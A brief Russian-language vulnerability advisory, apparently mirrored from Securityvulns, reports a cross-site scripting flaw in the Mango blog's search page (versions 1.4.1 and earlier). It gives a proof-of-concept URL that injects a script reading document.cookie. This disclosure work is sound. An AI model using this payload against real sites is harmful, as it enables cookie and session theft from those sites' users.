Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:23738
HistoryApr 30, 2010 - 12:00 a.m.

Cross-Site Scripting vulnerability in Mango

2010-04-3000:00:00
vulners.com
1358

Здравствуйте 3APA3A!

Сообщаю вам о найденной мною Cross-Site Scripting уязвимости в Mango.

XSS:

http://site/archives.cfm/search/?term=%3Cbody%20onload=alert(document.cookie)%3E

Уязвимы Mango 1.4.1 и предыдущие версии.

Дополнительная информация о данной уязвимости у меня на сайте:
http://websecurity.com.ua/3949/

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua